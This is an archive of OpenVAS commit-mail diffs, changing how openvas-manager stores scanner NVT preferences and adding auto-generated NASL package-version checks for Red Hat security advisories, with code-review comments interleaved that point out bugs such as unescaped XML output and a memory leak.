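Review bot: the removed send_preference ran both key and value through g_markup_escape_text before formatting them into the response, while the CLIENT_GET_PREFERENCES replacement in this patch passes nvt_preference_iterator_name and nvt_preference_iterator_value straight to SENDF_TO_CLIENT_OR_FAIL. These strings are read from the scanner in parse_scanner_preference_value, so confirm that SENDF_TO_CLIENT_OR_FAIL escapes its arguments; if it does not, escape name and value before sending so the OMP response stays well-formed XML.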
@@ -2550,22 +2518,26 @@ break; case CLIENT_GET_PREFERENCES: - if (scanner.preferences) - { - SEND_TO_CLIENT_OR_FAIL (""); - if (g_hash_table_find (scanner.preferences, send_preference, NULL)) - { - error_send_to_client (error); - return; - } - SEND_TO_CLIENT_OR_FAIL (""); - } - else - SEND_TO_CLIENT_OR_FAIL (XML_SERVICE_DOWN ("get_preferences")); - set_client_state (CLIENT_AUTHENTIC); - break; + { + iterator_t prefs; + SEND_TO_CLIENT_OR_FAIL (""); + init_nvt_preference_iterator (&prefs); + while (next (&prefs)) + { + SENDF_TO_CLIENT_OR_FAIL ("" + "%s" + "%s" + "", + nvt_preference_iterator_name (&prefs), + nvt_preference_iterator_value (&prefs)); + } + cleanup_iterator (&prefs); + SEND_TO_CLIENT_OR_FAIL (""); + set_client_state (CLIENT_AUTHENTIC); + break; + } case CLIENT_GET_CERTIFICATES: if (scanner.certificates) @@ -5203,7 +5175,8 @@ * * @param[in] log_config Logging configuration list. * - * @return 0 success, -1 error, -2 database is wrong version. + * @return 0 success, -1 error, -2 database is wrong version, -3 database + * needs to be initialized from server. */ int init_omp (GSList *log_config) Modified: trunk/openvas-manager/src/ompd.c =================================================================== --- trunk/openvas-manager/src/ompd.c 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/ompd.c 2009-10-05 21:54:23 UTC (rev 5377) @@ -95,7 +95,8 @@ * * @param[in] log_config Log configuration * - * @return 0 success, -1 error, -2 database is wrong version. + * @return 0 success, -1 error, -2 database is wrong version, -3 database + * needs to be initialized from server. */ int init_ompd (GSList *log_config) 
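Review bot: the @return text for init_omp and init_ompd now documents -3, but the only code in this patch that returns -3 is the check in init_manage, and that check is wrapped in #if 0. Either mark -3 as not yet returned, or add the documentation in the same change that enables the check. The spelling also differs between files: "initialized" here and "initialised" in tasks_sql.h.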
@@ -385,7 +386,12 @@ (scanner_session, ack + scanner_init_offset); if (scanner_init_offset == 0) - set_scanner_init_state (SCANNER_INIT_DONE); + { + if (ompd_nvt_cache_mode) + set_scanner_init_state (SCANNER_INIT_DONE_CACHE_MODE); + else + set_scanner_init_state (SCANNER_INIT_DONE); + } else if (scanner_init_offset == -1) { scanner_init_offset = 0; @@ -396,6 +402,7 @@ } /*@fallthrough@*/ case SCANNER_INIT_DONE: + case SCANNER_INIT_DONE_CACHE_MODE: while (1) switch (write_to_server_buffer (scanner_session)) { @@ -675,6 +682,7 @@ } if ((scanner_init_state == SCANNER_INIT_DONE + || scanner_init_state == SCANNER_INIT_DONE_CACHE_MODE || scanner_init_state == SCANNER_INIT_GOT_VERSION || scanner_init_state == SCANNER_INIT_SENT_COMPLETE_LIST || scanner_init_state == SCANNER_INIT_SENT_PASSWORD @@ -687,7 +695,8 @@ } if (((scanner_init_state == SCANNER_INIT_TOP - || scanner_init_state == SCANNER_INIT_DONE) + || scanner_init_state == SCANNER_INIT_DONE + || scanner_init_state == SCANNER_INIT_DONE_CACHE_MODE) && to_server_buffer_space () > 0) || scanner_init_state == SCANNER_INIT_CONNECT_INTR || scanner_init_state == SCANNER_INIT_CONNECTED Modified: trunk/openvas-manager/src/otp.c =================================================================== --- trunk/openvas-manager/src/otp.c 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/otp.c 2009-10-05 21:54:23 UTC (rev 5377) 
@@ -417,40 +417,6 @@ /*@null@*/ /*@only@*/ static char* current_scanner_preference = NULL; -/** - * @brief The current scanner preferences, during reading of scanner preferences. - */ -static GHashTable* current_scanner_preferences = NULL; - -/** - * @brief Create the scanner preferences. - */ -static GHashTable* -make_scanner_preferences () -{ - return g_hash_table_new_full (g_str_hash, - g_str_equal, - g_free, - g_free); -} - -/** - * @brief Add a preference to the scanner preferences. - * - * Both parameters are used directly, and are freed when the - * preferences are freed. - * - * @param[in] preference The preference. - * @param[in] value The value of the preference. - */ -static void -add_scanner_preference (GHashTable* preferences, - /*@keep@*/ char* preference, - /*@keep@*/ char* value) -{ - g_hash_table_insert (preferences, preference, value); -} - /* Scanner plugins. */ @@ -616,7 +582,6 @@ init_otp_data () { scanner.certificates = NULL; - scanner.preferences = NULL; scanner.rules = NULL; scanner.plugins_md5 = NULL; } @@ -1016,9 +981,7 @@ { match[0] = '\0'; value = g_strdup (*messages); - add_scanner_preference (current_scanner_preferences, - current_scanner_preference, - value); + manage_nvt_preference_add (current_scanner_preference, value); set_scanner_state (SCANNER_PREFERENCE_NAME); from_scanner_start += match + 1 - *messages; *messages = match + 1; @@ -1251,7 +1214,7 @@ * * This includes updating the scanner state with \ref set_scanner_state * and \ref set_scanner_init_state, and updating scanner records with functions - * like \ref add_scanner_preference and \ref append_task_open_port. + * like \ref manage_nvt_preference_add and \ref append_task_open_port. * * \endif * @@ -1373,6 +1336,7 @@ case SCANNER_INIT_SENT_COMPLETE_LIST: case SCANNER_INIT_SENT_PASSWORD: case SCANNER_INIT_DONE: + case SCANNER_INIT_DONE_CACHE_MODE: case SCANNER_INIT_TOP: if (scanner_state == SCANNER_TOP) switch (parse_scanner_bad_login (&messages)) 
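Review bot: in the parse_scanner_preference_value hunk of otp.c (@@ -1016,9 +981,7 @@), value = g_strdup (*messages) is now handed to manage_nvt_preference_add, which only reads it through sql_quote and frees the quoted copies. The removed add_scanner_preference was documented as taking ownership ("Both parameters are used directly, and are freed when the preferences are freed"), so with the hash table gone nothing in the visible lines frees value or current_scanner_preference. Free both after the call (and reset current_scanner_preference to NULL), or pass *messages directly and skip the g_strdup.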
@@ -1968,13 +1932,7 @@ if (scanner_init_state == SCANNER_INIT_SENT_COMPLETE_LIST) { set_scanner_init_state (SCANNER_INIT_GOT_PLUGINS); - /* Initialisation only sends COMPLETE_LIST when - * caching plugins, so return 1 (as though the - * scanner sent BYE). */ - // FIX should perhaps exit more formally with - // scanner set_nvts_md5sum (scanner.plugins_md5); - return 1; } break; case -1: return -1; @@ -2142,10 +2100,15 @@ if (sync_buffer ()) return -1; return 0; } - if (scanner.preferences) - g_hash_table_destroy (scanner.preferences); - scanner.preferences = current_scanner_preferences; - current_scanner_preferences = NULL; + if (scanner_init_state == SCANNER_INIT_DONE_CACHE_MODE) + { + set_scanner_init_state (SCANNER_INIT_DONE); + manage_nvt_preferences_enable (); + /* Return 1, as though the scanner sent BYE. */ + // FIX should perhaps exit more formally with scanner + scanner_active = 0; + return 1; + } break; } { @@ -2216,7 +2179,6 @@ else if (strcasecmp ("PREFERENCES", field) == 0) { assert (current_scanner_preference == NULL); - current_scanner_preferences = make_scanner_preferences (); set_scanner_state (SCANNER_PREFERENCE_NAME); } else if (strcasecmp ("RULES", field) == 0) Modified: trunk/openvas-manager/src/otp.h =================================================================== --- trunk/openvas-manager/src/otp.h 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/otp.h 2009-10-05 21:54:23 UTC (rev 5377) 
@@ -44,6 +44,7 @@ SCANNER_INIT_CONNECT_INTR, /* `connect' to scanner was interrupted. */ SCANNER_INIT_CONNECTED, SCANNER_INIT_DONE, + SCANNER_INIT_DONE_CACHE_MODE, /* Done state when in NVT caching mode. */ SCANNER_INIT_GOT_MD5SUM, SCANNER_INIT_GOT_PASSWORD, SCANNER_INIT_GOT_PLUGINS, Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/tasks_sql.h 2009-10-05 21:54:23 UTC (rev 5377) @@ -715,6 +715,7 @@ { sql ("BEGIN EXCLUSIVE;"); sql ("DELETE FROM nvts;"); + sql ("DELETE FROM nvt_preferences;"); sql ("DELETE FROM meta WHERE name = 'nvts_checksum';"); sql ("COMMIT;"); } @@ -746,6 +747,7 @@ { sql ("BEGIN EXCLUSIVE;"); sql ("DELETE FROM nvts;"); + sql ("DELETE FROM nvt_preferences;"); sql ("DELETE FROM meta WHERE name = 'nvts_checksum';"); sql ("COMMIT;"); } @@ -887,7 +889,8 @@ * Beware that calling this function while tasks are running may lead to * problems. * - * @return 0 success, -1 error, -2 database is wrong version. + * @return 0 success, -1 error, -2 database is wrong version, -3 database needs + * to be initialised from server. */ int init_manage (GSList *log_config) @@ -912,6 +915,22 @@ && strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) return -2; +#if 0 + /** @todo Skip this when in NVT caching mode. */ + + /* Check that the database was initialised from the scanner. */ + + { + long long int count; + if (sql_int64 (&count, 0, 0, + "SELECT count(*) FROM meta" + " WHERE name = 'nvt_md5sum'" + " OR name = 'nvt_preferences_enabled';") + || count < 2) + return -3; + } +#endif + /* Ensure the tables exist. */ sql ("CREATE TABLE IF NOT EXISTS meta (name UNIQUE, value);"); 
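Review bot: the disabled initialisation check in init_manage counts meta rows named 'nvt_md5sum', while the DELETE statements earlier in tasks_sql.h clear a row named 'nvts_checksum'. If the checksum is stored under 'nvts_checksum', count < 2 will always hold once the #if 0 is removed and init_manage will return -3 on every start; use the same key name in both places. The two DELETE blocks also clear nvt_preferences without removing the 'nvt_preferences_enabled' row from meta, so that flag would survive a cache reset.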
@@ -927,6 +946,7 @@ sql ("CREATE TABLE IF NOT EXISTS report_hosts (report INTEGER, host, start_time, end_time, attack_state, current_port, max_port);"); sql ("CREATE TABLE IF NOT EXISTS report_results (report INTEGER, result INTEGER);"); sql ("CREATE TABLE IF NOT EXISTS nvts (oid, version, name, summary, description, copyright, cve, bid, xref, tag, sign_key_ids, category, family);"); + sql ("CREATE TABLE IF NOT EXISTS nvt_preferences (name, value);"); sql ("CREATE TABLE IF NOT EXISTS lsc_credentials (name, comment, rpm, deb, dog);"); /* Ensure the version is set. */ @@ -4432,6 +4452,54 @@ } +/* NVT preferences. */ + +/** + * @brief Add an NVT preference. + * + * @param[in] name The name of the preference. + * @param[in] value The value of the preference. + */ +void +manage_nvt_preference_add (char* name, char* value) +{ + gchar* quoted_name = sql_quote (name); + gchar* quoted_value = sql_quote (value); + sql ("INSERT into nvt_preferences (name, value)" + " VALUES ('%s', '%s');", + quoted_name, quoted_value); + g_free (quoted_name); + g_free (quoted_value); +} + +/** + * @brief Add an NVT preference. + * + * @param[in] name The name of the preference. + * @param[in] value The value of the preference. + */ +void +manage_nvt_preferences_enable () +{ + sql ("INSERT OR REPLACE INTO meta (name, value)" + " VALUES ('nvt_preferences_enabled', 1);"); +} + +/** + * @brief Initialise an NVT preference iterator. + * + * @param[in] iterator Iterator. + */ +void +init_nvt_preference_iterator (iterator_t* iterator) +{ + init_table_iterator (iterator, "nvt_preferences"); +} + +DEF_ACCESS (nvt_preference_iterator_name, 0); +DEF_ACCESS (nvt_preference_iterator_value, 1); + + /* LSC Credentials. */ /** From scm-commit at wald.intevation.org Tue Oct 6 02:49:43 2009 
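Review bot: the doc comment on manage_nvt_preferences_enable in tasks_sql.h is a copy of the one on manage_nvt_preference_add: it says "Add an NVT preference" and lists @param name and @param value for a function that takes no arguments. Describe what the function does (sets 'nvt_preferences_enabled' in meta) and drop the @param lines. Separately, nvt_preferences is created as (name, value) with no uniqueness constraint and manage_nvt_preference_add uses a plain INSERT, so a preference received twice is stored twice; consider declaring name UNIQUE and using INSERT OR REPLACE, as is already done for meta.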
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 02:49:43 +0200 (CEST) Subject: [Openvas-commits] r5378 - in trunk/openvas-plugins: . scripts Message-ID: <20091006004943.4537D852B6F9@pyrosoma.intevation.org> Author: reinke Date: 2009-10-06 02:49:40 +0200 (Tue, 06 Oct 2009) New Revision: 5378 Added: trunk/openvas-plugins/scripts/RHSA_2009_1455.nasl trunk/openvas-plugins/scripts/RHSA_2009_1465.nasl trunk/openvas-plugins/scripts/RHSA_2009_1470.nasl trunk/openvas-plugins/scripts/RHSA_2009_1471.nasl trunk/openvas-plugins/scripts/RHSA_2009_1472.nasl trunk/openvas-plugins/scripts/deb_1896_1.nasl trunk/openvas-plugins/scripts/deb_1897_1.nasl trunk/openvas-plugins/scripts/deb_1898_1.nasl trunk/openvas-plugins/scripts/deb_1899_1.nasl trunk/openvas-plugins/scripts/deb_1900_1.nasl trunk/openvas-plugins/scripts/deb_1901_1.nasl trunk/openvas-plugins/scripts/fcore_2009_10165.nasl trunk/openvas-plugins/scripts/fcore_2009_10172.nasl trunk/openvas-plugins/scripts/fcore_2009_10180.nasl trunk/openvas-plugins/scripts/freebsd_mybb.nasl trunk/openvas-plugins/scripts/freebsdsa_devfs1.nasl trunk/openvas-plugins/scripts/freebsdsa_pipe1.nasl trunk/openvas-plugins/scripts/mdksa_2009_249.nasl trunk/openvas-plugins/scripts/mdksa_2009_253.nasl trunk/openvas-plugins/scripts/mdksa_2009_254.nasl trunk/openvas-plugins/scripts/mdksa_2009_255.nasl trunk/openvas-plugins/scripts/ubuntu_838_1.nasl trunk/openvas-plugins/scripts/ubuntu_839_1.nasl Modified: trunk/openvas-plugins/ChangeLog Log: New scripts added Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/ChangeLog 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -1,3 +1,31 @@ +2009-10-05 Thomas Reinke + + *scripts/deb_1896_1.nasl, + scripts/deb_1897_1.nasl, + scripts/deb_1898_1.nasl, + scripts/deb_1899_1.nasl, + scripts/deb_1900_1.nasl, + scripts/deb_1901_1.nasl, + scripts/freebsd_mybb.nasl, + scripts/freebsdsa_devfs1.nasl, + scripts/freebsdsa_pipe1.nasl, + scripts/ubuntu_838_1.nasl, + scripts/ubuntu_839_1.nasl, + scripts/mdksa_2009_249.nasl, + scripts/mdksa_2009_253.nasl, + scripts/mdksa_2009_254.nasl, + scripts/mdksa_2009_255.nasl, + scripts/RHSA_2009_1455.nasl, + scripts/RHSA_2009_1465.nasl, + scripts/RHSA_2009_1470.nasl, + scripts/RHSA_2009_1471.nasl, + scripts/RHSA_2009_1472.nasl, + scripts/fcore_2009_10165.nasl, + scripts/fcore_2009_10172.nasl, + scripts/fcore_2009_10180.nasl: + New plugins. + + 2009-10-05 Michael Meyer * scripts/cvspserver_version.nasl, Added: trunk/openvas-plugins/scripts/RHSA_2009_1455.nasl =================================================================== --- trunk/openvas-plugins/scripts/RHSA_2009_1455.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/RHSA_2009_1455.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,142 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory RHSA-2009:1455 () +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64991); + script_cve_id("CVE-2009-2849"); + script_version ("$"); + script_name("RedHat Security Advisory RHSA-2009:1455"); + + desc = " +The remote host is missing updates to the kernel announced in +advisory RHSA-2009:1455. + +Security fix: + +* a NULL pointer dereference flaw was found in the Multiple Devices (md) +driver in the Linux kernel. If the suspend_lo or suspend_hi file on the +sysfs file system (/sys/) is modified when the disk array is inactive, it +could lead to a local denial of service or privilege escalation. Note: By +default, only the root user can write to the files mentioned above. +(CVE-2009-2849, Moderate) + +For details on other bug fixes applied to this update, please visit +the referenced security advisories. + +Users should upgrade to these updated packages, which contain backported +patches to correct these issues. 
The system must be rebooted for this +update to take effect. + +Solution: +Please note that this update is available via +Red Hat Network. To use Red Hat Network, launch the Red +Hat Update Agent with the following command: up2date + +http://rhn.redhat.com/errata/RHSA-2009-1455.html +http://www.redhat.com/security/updates/classification/#moderate + +Risk factor : Medium"; + + script_description(desc); + + script_summary("Redhat Security Advisory RHSA-2009:1455"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"kernel", rpm:"kernel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE", rpm:"kernel-PAE~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE-debuginfo", rpm:"kernel-PAE-debuginfo~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE-devel", rpm:"kernel-PAE-devel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug", rpm:"kernel-debug~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug-debuginfo", rpm:"kernel-debug-debuginfo~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug-devel", rpm:"kernel-debug-devel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debuginfo", rpm:"kernel-debuginfo~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debuginfo-common", rpm:"kernel-debuginfo-common~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-devel", rpm:"kernel-devel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} 
+if(isrpmvuln(pkg:"kernel-headers", rpm:"kernel-headers~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-xen", rpm:"kernel-xen~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-xen-debuginfo", rpm:"kernel-xen-debuginfo~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-xen-devel", rpm:"kernel-xen-devel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-doc", rpm:"kernel-doc~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-kdump", rpm:"kernel-kdump~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-kdump-debuginfo", rpm:"kernel-kdump-debuginfo~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-kdump-devel", rpm:"kernel-kdump-devel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/RHSA_2009_1465.nasl =================================================================== --- trunk/openvas-plugins/scripts/RHSA_2009_1465.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/RHSA_2009_1465.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
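Review bot: in RHSA_2009_1455.nasl the description ends with "Risk factor : Medium" but the result is reported with security_hole(0); use the reporting call that matches the stated severity, or adjust the text. The line script_version ("$"); also looks like a keyword that lost its name (compare "1.1-$Revision$" in sympa_detect.nasl). RHSA_2009_1470.nasl has the same Medium/security_hole mismatch, and the script_version line recurs in each generated RHSA script in this commit, so the fix belongs in the generator.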
@@ -0,0 +1,100 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory RHSA-2009:1465 () +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64990); + script_cve_id("CVE-2009-3290"); + script_version ("$"); + script_name("RedHat Security Advisory RHSA-2009:1465"); + + desc = " +The remote host is missing updates announced in +advisory RHSA-2009:1465. + +KVM (Kernel-based Virtual Machine) is a full virtualization solution for +Linux on AMD64 and Intel 64 systems. KVM is a Linux kernel module built for +the standard Red Hat Enterprise Linux kernel. + +The kvm_emulate_hypercall() implementation was missing a check for the +Current Privilege Level (CPL). A local, unprivileged user in a virtual +machine could use this flaw to cause a local denial of service or escalate +their privileges within that virtual machine. (CVE-2009-3290) + +All KVM users should upgrade to these updated packages, which contain +backported patches to resolve these issues. 
Note: The procedure in the +Solution section must be performed before this update takes effect. + +Solution: +Please note that this update is available via +Red Hat Network. To use Red Hat Network, launch the Red +Hat Update Agent with the following command: up2date + +http://rhn.redhat.com/errata/RHSA-2009-1465.html +http://www.redhat.com/security/updates/classification/#important + +Risk factor : High"; + + script_description(desc); + + script_summary("Redhat Security Advisory RHSA-2009:1465"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"kmod-kvm", rpm:"kmod-kvm~83~105.el5_4.7", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kvm", rpm:"kvm~83~105.el5_4.7", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kvm-debuginfo", rpm:"kvm-debuginfo~83~105.el5_4.7", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kvm-qemu-img", rpm:"kvm-qemu-img~83~105.el5_4.7", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kvm-tools", rpm:"kvm-tools~83~105.el5_4.7", rls:"RHENT_5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/RHSA_2009_1470.nasl =================================================================== --- trunk/openvas-plugins/scripts/RHSA_2009_1470.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/RHSA_2009_1470.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,103 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory RHSA-2009:1470 () +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64992); + script_cve_id("CVE-2009-2904"); + script_version ("$"); + script_name("RedHat Security Advisory RHSA-2009:1470"); + + desc = " +The remote host is missing updates announced in +advisory RHSA-2009:1470. + +OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These +packages include the core files necessary for both the OpenSSH client and +server. + +A Red Hat specific patch used in the openssh packages as shipped in Red +Hat Enterprise Linux 5.4 (RHSA-2009:1287) loosened certain ownership +requirements for directories used as arguments for the ChrootDirectory +configuration options. A malicious user that also has or previously had +non-chroot shell access to a system could possibly use this flaw to +escalate their privileges and run commands as any system user. 
+(CVE-2009-2904) + +All OpenSSH users are advised to upgrade to these updated packages, which +contain a backported patch to resolve this issue. After installing this +update, the OpenSSH server daemon (sshd) will be restarted automatically. + +Solution: +Please note that this update is available via +Red Hat Network. To use Red Hat Network, launch the Red +Hat Update Agent with the following command: up2date + +http://rhn.redhat.com/errata/RHSA-2009-1470.html +http://www.redhat.com/security/updates/classification/#moderate + +Risk factor : Medium"; + + script_description(desc); + + script_summary("Redhat Security Advisory RHSA-2009:1470"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"openssh", rpm:"openssh~4.3p2~36.el5_4.2", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"openssh-askpass", rpm:"openssh-askpass~4.3p2~36.el5_4.2", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"openssh-clients", rpm:"openssh-clients~4.3p2~36.el5_4.2", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"openssh-debuginfo", rpm:"openssh-debuginfo~4.3p2~36.el5_4.2", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"openssh-server", rpm:"openssh-server~4.3p2~36.el5_4.2", rls:"RHENT_5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/RHSA_2009_1471.nasl =================================================================== --- trunk/openvas-plugins/scripts/RHSA_2009_1471.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/RHSA_2009_1471.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,103 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory RHSA-2009:1471 () +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64993); + script_cve_id("CVE-2007-2027", "CVE-2008-7224"); + script_version ("$"); + script_name("RedHat Security Advisory RHSA-2009:1471"); + + desc = " +The remote host is missing updates announced in +advisory RHSA-2009:1471. + +ELinks is a text-based Web browser. ELinks does not display any images, but +it does support frames, tables, and most other HTML tags. + +An off-by-one buffer overflow flaw was discovered in the way ELinks handled +its internal cache of string representations for HTML special entities. A +remote attacker could use this flaw to create a specially-crafted HTML file +that would cause ELinks to crash or, possibly, execute arbitrary code when +rendered. (CVE-2008-7224) + +It was discovered that ELinks tried to load translation files using +relative paths. 
A local attacker able to trick a victim into running ELinks +in a folder containing specially-crafted translation files could use this +flaw to confuse the victim via incorrect translations, or cause ELinks to +crash and possibly execute arbitrary code via embedded formatting sequences +in translated messages. (CVE-2007-2027) + +All ELinks users are advised to upgrade to this updated package, which +contains backported patches to resolve these issues. + +Solution: +Please note that this update is available via +Red Hat Network. To use Red Hat Network, launch the Red +Hat Update Agent with the following command: up2date + +http://rhn.redhat.com/errata/RHSA-2009-1471.html +http://www.redhat.com/security/updates/classification/#important + +Risk factor : High"; + + script_description(desc); + + script_summary("Redhat Security Advisory RHSA-2009:1471"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"elinks", rpm:"elinks~0.9.2~4.el4_8.1", rls:"RHENT_4")) { + vuln = 1; +} 